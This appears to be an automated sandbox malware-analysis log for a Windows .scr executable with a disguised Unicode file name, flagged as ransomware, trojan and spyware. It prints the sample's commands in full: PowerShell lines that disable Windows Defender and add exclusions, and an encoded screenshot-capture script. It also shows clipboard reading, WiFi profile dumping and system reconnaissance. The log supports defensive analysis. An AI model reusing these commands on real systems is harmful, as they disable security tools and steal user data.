Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343586290.00007FF8BA259000.00000002.00000001.01000000.00000006.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs #U202f#U202f#U2005#U00a0.scr.exe

Source: libcrypto-3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9989650991958289
Source: libssl-3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9923451741536459
Source: python312.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9992524518674001
Source: sqlite3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9974527256801319
Source: unicodedata.pyd.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9951941924283154

Source: classification engine

Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@144/95@2/2

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe

Code function: 0_2_00007FF73AE18560 GetLastError,FormatMessageW,WideCharToMultiByte,

0_2_00007FF73AE18560

Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7ECB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,		68_2_00007FF7F7ECB57C
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7E9EF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,		68_2_00007FF7F7E9EF50

Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe

Code function: 68_2_00007FF7F7EA3144 GetDiskFreeSpaceExW,

68_2_00007FF7F7EA3144

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7336:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1848:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7792:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7220:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7060:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7728:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1276:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7700:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3136:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_03
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Mutant created: \Sessions\1\BaseNamedObjects\x
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1968:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6176:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7228:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe

File created: C:\Users\user\AppData\Local\Temp\_MEI17882

Jump to behavior

Source: #U202f#U202f#U2005#U00a0.scr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: #U202f#U202f#U2005#U00a0.scr.exe	ReversingLabs: Detection: 71%
Source: #U202f#U202f#U2005#U00a0.scr.exe	Virustotal: Detection: 72%

Source: #U202f#U202f#U2005#U00a0.scr.exe	String found in binary or memory: set-addPolicy
Source: #U202f#U202f#U2005#U00a0.scr.exe	String found in binary or memory: id-cmc-addExtensions

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe

File read: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe "C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe "C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6756.tmp" "c:\Users\user\AppData\Local\Temp\xuxqeuoy\CSC1B8650382DAF4CDABC63EC72E90C84.TMP"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
